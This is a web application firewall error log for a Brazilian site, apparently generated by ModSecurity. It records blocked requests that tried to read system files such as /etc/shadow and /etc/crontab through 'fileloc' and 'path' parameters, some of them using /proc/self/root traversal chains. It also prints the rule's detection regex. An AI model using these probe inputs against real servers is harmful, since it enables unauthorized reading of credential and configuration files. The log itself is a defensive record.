[Fri Mar 20 11:34:09.755245 2026] [:error] [pid 7235:tid 140411691570944] [client 216.73.216.191:49992] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a4fqxLDW4GITHUkQYlgAAAQY"]
[Fri Mar 20 11:34:11.545288 2026] [:error] [pid 9818:tid 140411725141760] [client 216.73.216.191:50026] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a4l1pVZ5mVmJwsFNdDwAAAEI"]
[Fri Mar 20 11:34:13.024696 2026] [:error] [pid 10189:tid 140411565680384] [client 57.141.18.101:50076] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1a4zJ3M9BSuKP7CAZV-wAAAJU"]
[Fri Mar 20 11:34:15.647317 2026] [:error] [pid 11642:tid 140411616036608] [client 216.73.216.191:50046] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a5rninkcc-iUj5AqLMwAAA48"]
[Fri Mar 20 11:34:15.667189 2026] [:error] [pid 9818:tid 140411658000128] [client 216.73.216.191:50206] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a5l1pVZ5mVmJwsFNdFAAAAEo"]
[Fri Mar 20 11:34:16.487093 2026] [:error] [pid 9818:tid 140411649607424] [client 216.73.216.191:50306] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a6F1pVZ5mVmJwsFNdHAAAAEs"]
[Fri Mar 20 11:34:16.999172 2026] [:error] [pid 11642:tid 140411691570944] [client 216.73.216.191:50074] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a6Lninkcc-iUj5AqLNAAAA4Y"]
[Fri Mar 20 11:34:17.303253 2026] [:error] [pid 31215:tid 140411574073088] [client 216.73.216.191:50344] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a6QF0L0L-SsrnPo6X0AAAAtQ"]
[Fri Mar 20 11:34:17.740385 2026] [:error] [pid 7893:tid 140411557287680] [client 216.73.216.191:50318] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a6RCii7xarUs8iHaZEAAAAhY"]
[Fri Mar 20 11:34:18.303340 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:37342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1a6vqxLDW4GITHUkQYngAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:34:19.267358 2026] [:error] [pid 9818:tid 140411557287680] [client 216.73.216.191:50482] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a611pVZ5mVmJwsFNdIgAAAFY"]
[Fri Mar 20 11:34:20.399344 2026] [:error] [pid 21219:tid 140411725141760] [client 216.73.216.191:50504] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a7PXLqtnMIWvjpaLJgwAAAoI"]
[Fri Mar 20 11:34:22.293794 2026] [mime_magic:error] [pid 26799:tid 140411708356352] (70014)End of file found: [client 74.7.241.31:36222] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/sys/devices
[Fri Mar 20 11:34:22.530989 2026] [:error] [pid 7235:tid 140411691570944] [client 216.73.216.191:50714] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a7vqxLDW4GITHUkQYpAAAAQY"]
[Fri Mar 20 11:34:23.171244 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:36226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1a7_qxLDW4GITHUkQYpgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:34:23.779560 2026] [:error] [pid 26799:tid 140411616036608] [client 216.73.216.191:50782] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a79a6ubjKNq_cu4YKCgAAA08"]
[Fri Mar 20 11:34:26.107582 2026] [:error] [pid 21219:tid 140411616036608] [client 216.73.216.191:50876] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a8fXLqtnMIWvjpaLJigAAAo8"]
[Fri Mar 20 11:34:26.399414 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:50926] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a8uoXxyEfFpUF8f-uSAAAAUw"]
[Fri Mar 20 11:34:27.894867 2026] [:error] [pid 7893:tid 140411674785536] [client 216.73.216.191:51004] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a8xCii7xarUs8iHaZJQAAAgg"]
[Fri Mar 20 11:34:28.215425 2026] [:error] [pid 7893:tid 140411699963648] [client 216.73.216.191:50924] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a9BCii7xarUs8iHaZJwAAAgU"]
[Fri Mar 20 11:34:30.030870 2026] [:error] [pid 15826:tid 140411557287680] [client 216.73.216.191:51162] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a9uoXxyEfFpUF8f-uTwAAAVY"]
[Fri Mar 20 11:34:31.691244 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.228.61:41772] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1a9xCii7xarUs8iHaZKwAAAg8"]
[Fri Mar 20 11:34:43.447008 2026] [:error] [pid 31215:tid 140411658000128] [client 57.141.18.15:51574] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1bAwF0L0L-SsrnPo6X4QAAAso"]
[Fri Mar 20 11:34:54.924751 2026] [:error] [pid 31215:tid 140411540502272] [client 57.141.18.64:51910] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1bDgF0L0L-SsrnPo6X5QAAAtg"]
[Fri Mar 20 11:35:04.958618 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:57098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bGBCii7xarUs8iHaZewAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:35:10.024499 2026] [:error] [pid 11642:tid 140411599251200] [client 57.141.18.119:52248] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1bHrninkcc-iUj5AqLQwAAA5E"]
[Fri Mar 20 11:35:20.383734 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:57736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bKOoXxyEfFpUF8f-uewAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:35:29.882943 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:38992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1bMQF0L0L-SsrnPo6X8gAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:35:40.999582 2026] [:error] [pid 11642:tid 140411699963648] [client 57.141.18.92:53348] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1bPLninkcc-iUj5AqLUQAAA4U"]
